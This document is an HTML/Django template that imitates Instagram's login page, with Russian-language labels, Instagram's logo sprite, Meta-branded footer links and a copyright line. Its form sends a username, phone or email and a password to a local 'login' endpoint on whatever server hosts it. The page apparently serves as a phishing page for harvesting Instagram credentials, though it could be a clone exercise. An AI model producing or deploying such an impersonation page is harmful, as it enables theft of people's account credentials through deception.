<!DOCTYPE html>
<html>
<head>
    <meta charset='utf-8'>
    <meta http-equiv='X-UA-Compatible' content='IE=edge'>
    <title>Instagram</title>
    <meta name='viewport' content='width=device-width, initial-scale=1'>
    <link rel='stylesheet' type='text/css' media='screen' href='main.css'>
    <script src='main.js'></script>
</head>
<body>
    <style>
        body {
            font-family:system-ui, -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;
            background-color: #fafafa;
            box-sizing: border-box;
          }
          
          a {
            text-decoration: none;
          }
          
          .container {
            max-width: 1000px;
            margin: 0 auto;
            display: flex;
            justify-content: center;
            flex-direction: column;
            align-items: center;
            margin-top: 3rem;
            font-size: 14px;
          }
          
          .box {
            max-width: 350px;
            width: 100%;
            display: flex;
            justify-content: center;
            align-items: center;
            flex-direction: column;
            background-color: #ffff;
            border: 1px solid #e6e6e6;
            border-radius: 1px;
            margin: 0 0 10px;
            padding: 10px 0;
            flex-grow: 1;
          }
          
          .heading {
            margin: 22px auto 12px;
            background-image: url("https://www.instagram.com/static/bundles/es6/sprite_core_b20f2a3cd7e4.png/b20f2a3cd7e4.png");
            background-position: -98px 0;
            height: 51px;
            width: 177px;
            overflow: hidden;
          }
          
          .field {
            margin: 10px 0;
            position: relative;
            font-size: 14px;
            width: 100%;
            text-overflow: ellipsis;
          }
          
          input {
            padding: 9px 0px 7px 9px;
            font-size: 12px;
            width: 16rem;
            height: 1.2rem;
            outline: none;
            background: #fafafa;
            border-radius: 3px;
            border: 1px solid #efefef;
          }
          
          /* label intial position*/
          
          label {
            position: absolute;
            pointer-events: none;
            left: 10px;
            padding-bottom: 15px;
            transform: translateY(10px);
            line-height: 6px;
            transition: all ease-out 0.1s;
            font-size: 12px;
            color: #999;
            padding-top: 6px;
          }
          
          /* hiding placeholder in all browsers */
          
          input::placeholder {
            visibility: hidden;
          }
          
          /* hiding  placeholder in mozilla */
          .login-form ::-moz-placeholder {
            color: transparent;
          }
          
          /* label final position */
          input:not(:placeholder-shown) + label {
            transform: translateY(0);
            font-size: 11px;
          }
          
          /* input padding increases if placeholder is not shown */
          input:not(:placeholder-shown) {
            padding-top: 14px;
            padding-bottom: 2px;
          }
          
          .login-button {
            text-align: center;
            width: 100%;
            padding: 0.5rem;
            border: 1px solid transparent;
            background-color: #3897f0;
            color: #fff;
            font-weight: 600;
            font-size: 14px;
            cursor: pointer;
          }
          
          .separator {
            display: flex;
            justify-content: space-between;
            align-items: center;
            color: #999;
            margin-top: 6px;
          }
          
          .separator .line {
            height: 1px;
            width: 40%;
            background-color: #dbdbdb;
          }
          
          .other {
            display: flex;
            justify-content: center;
            flex-direction: column;
            align-items: center;
          }
          
          .fb-login-btn {
            margin: 1rem;
            border: 0;
            cursor: pointer;
            font-size: 14px;
            color: #385185;
            font-weight: 600;
            background: transparent;
          }
          
          .fb-icon {
            color: #385185;
            font-size: 1rem;
            padding-right: 1px;
          }
          
          .forgot-password {
            font-size: 11px;
            color: #003569;
          }
          
          .signup {
            color: #3897f0;
            font-weight: 600;
          }
          footer {
            width: 70%;
            text-align: center;
            margin-top: 2rem;
        }
        
        footer a,
        footer span,
        footer select {
            font-size: 12px;
            color: #8e8e8e;
            text-decoration: none;
            margin: 5px;
        }
        
        footer select {
            outline: none;
            border: none;
            background-color: #eee;
        }
    </style>
    <div class="container">
        <div class="box">
            <div class="heading"></div>
            <form class="login-form" action="login" method="post">
                {% csrf_token %}
                <div class="field">
                    <input id="username" name="login" type="name" placeholder="Phone number, username, or email" />
                    <label for="username">Телефон, или имя пользователя </label>
                </div>
                <div class="field">
                    <input id="password" name="password" type="password" placeholder="password" />
                    <label for="password">Пароль</label>
                </div>
                <button class="login-button" type="submit" title="login">Войти</button>
                <div class="separator">
                    <div class="line"></div>
                    <p>ИЛИ</p>
                    <div class="line"></div>
                </div>
                <div class="other">
                    <button class="fb-login-btn" type="button">
                        <i class="fa fa-facebook-official fb-icon"></i>
                        <span class="">Войти через Facebook</span>
                    </button>
                    <a class="forgot-password" href="#">Забыли пароль?</a>
                </div>
            </form>
        </div>
        <div class="box">
            <p>У вас ещё нет аккаунта?<a class="signup" href="#"> Зарегистрироваться</a></p>
        </div>
        <footer>
            <a href="">Meta</a>
            <a href="">About</a>
            <a href="">Blog</a>
            <a href="">Jobs</a>
            <a href="">Help</a>
            <a href="">API</a>
            <a href="">Privacy</a>
            <a href="">Terms</a>
            <a href="">Top Accounts</a>
            <a href="">Locations</a>
            <a href="">Instagram Lite</a>
            <a href="">Instagram Contact</a>
            <a href="">Uploading & Non-Users</a>
            <div class="bottom-footer">
                <select name="" id="">
                    <option value="English">Русский</option>
                    <option value="Hindi">English</option>
                    <option value="Punjabi">Kyrgyz</option>
                    <option value="Urdu">Urdu</option>
                    <option value="Francais">Francais</option>
                </select>
                <span> &copy; 2023 Instagram from Meta</span>
            </div>
        </footer>

    </div>
    
</body>
</html>

